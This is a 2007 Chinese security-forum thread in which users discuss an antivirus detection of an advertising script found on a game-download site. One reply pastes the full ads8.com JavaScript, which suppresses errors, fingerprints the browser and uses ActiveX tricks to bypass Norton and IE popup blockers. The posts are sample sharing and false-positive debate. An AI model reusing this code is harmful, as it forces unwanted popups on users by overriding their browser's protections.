收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 搜游戏,中病毒……ess报!
12下一页
返回列表 发新帖
查看: 2834|回复: 10
收起左侧

[病毒样本] 搜游戏,中病毒……ess报!

[复制链接]
傻猪猪米走鸡
发表于 2007-4-15 16:17:33 | 显示全部楼层 |阅读模式
难得有心情想下载个《天旋地转3》来玩玩,结果没上去就报毒了。
http://www.chuansuo.net/58/51/07/9020/
ESS值得骄傲!

报告内容:
2007-4-15 16:11:12
ePfw-Http
file http://i.ads8.com/pds_k/view.php?id=1996&uid=18581&rePlace=0&visits=1&a_width=0&a_height=0&a_class=9&a_pic_url=&ed_str=http://www.chuansuo.net/58/51/07/9020/&ed_ads_open_class=0&ed_ads_logo=0&ed_ads_tempstop=&ed_ads_webtest=0&ed_ads_group= JS/TrojanDownloader.IstBar.G trojan
connection terminated
回复

举报

金剑
头像被屏蔽
发表于 2007-4-15 16:18:43 | 显示全部楼层
var click_string='31383538312c313939362c313137363632363232332c687474703a2f2f7777772e636875616e73756f2e6e65742f35382f35312f30372f393032302f2c392c302c302c30'; var blankurl='http://i.ads8.com/'; var ads_click_test='8251a88654a70a482182533e40e4754b'; ed_ads_open_class='0'; AdsID='1996'; var totmp=0; if(totmp!=1){ //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// var paypopupURL = ""+blankurl+"/pds_k/click.php?click_string="+click_string+"&ads_click_test=8251a88654a70a482182533e40e4754b"; var usingActiveX = true; function blockError(){return true;} window.onerror = blockError; //bypass norton internet security popup blocker if (window.SymRealWinOpen){window.open = SymRealWinOpen;} if (window.NS_ActualOpen) {window.open = NS_ActualOpen;} if (typeof(usingClick) == 'undefined') {var usingClick = false;} if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;} if (typeof(popwin) == 'undefined') {var popwin = null;} if (typeof(poped) == 'undefined') {var poped = false;} if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://www.ads8.com";} var blk = 1; var setupClickSuccess = false; var googleInUse = false; var myurl = location.href+'/'; var MAX_TRIED = 20; var activeXTried = false; var tried = 0; var randkey = '0'; // random key from server var myWindow; var popWindow; var setupActiveXSuccess = 0; // bypass IE functions function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('');popWindow=window.createPopup();popWindow.document.body.innerHTML='
';document.write('');popIframe.document.write('');setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}} function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow) {myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace('about:blank');}else {setTimeout('tryActiveX()',200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}} function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout('openActiveX();',100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}} function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,'abcdefg');if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}} // end bypass IE functions // normal call functions function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}} // end normal call functions // onclick call functions function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}} function gopop() {if (!poped) {popwin = window.open(paypopupURL,'abcdefg');if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}} // end onclick call functions // check version function detectGoogle() {if (usingActiveX) {try {document.write('

');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}} function version() {var os = 'W0';var bs = 'I0';var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf('Win') != -1) {os = 'W1';}if (browser.indexOf("SV1") != -1) {bs = 'I2';}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();} version(); // end check version function loadingPop() { if(!usingClick && !usingActiveX) { paypopup(); } else if (usingActiveX) {tryActiveX();} else {setupClick();} } myurl = myurl.substring(0, myurl.indexOf('/',8)); if (myurl == '') {myurl = '.';} setupActiveX(); loadingPop(); self.focus(); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //document.writeln(" "); } //document.writeln(""); //document.writeln("");
回复

举报

金剑
头像被屏蔽
发表于 2007-4-15 16:19:01 | 显示全部楼层
好像是误报
回复

举报

mofunzone
发表于 2007-4-15 16:25:17 | 显示全部楼层
ess的误报值得骄傲
回复

举报

The EQs
发表于 2007-4-15 17:05:21 | 显示全部楼层
avira的误报那才叫做爽。。。。。系统文件稍微加壳就给你杀壳了。。。哈哈
回复

举报

mofunzone
发表于 2007-4-15 17:20:01 | 显示全部楼层
原帖由 EQ2 于 2007-4-15 01:05 发表
avira的误报那才叫做爽。。。。。系统文件稍微加壳就给你杀壳了。。。哈哈

可惜的是没有正常系统文件加壳的
回复

举报

The EQs
发表于 2007-4-15 17:22:27 | 显示全部楼层

回复 #6 mofunzone 的帖子

你确定????UPX和ASPACK不是正常的加壳工具??搞笑了。。。
回复

举报

KAV-Longhorn
发表于 2007-4-15 17:49:12 | 显示全部楼层
那EQ兄你就给系统的explorer.exe加个UPX,再发上来给我测试一下看看吧
回复

举报

zzh161
发表于 2007-4-15 18:27:47 | 显示全部楼层
打开这个页面费尔就报广告程序
回复

举报

jy416
发表于 2007-4-15 19:08:31 | 显示全部楼层
ESS在样本区表现不好啊!
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-2 12:02 , Processed in 0.123073 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表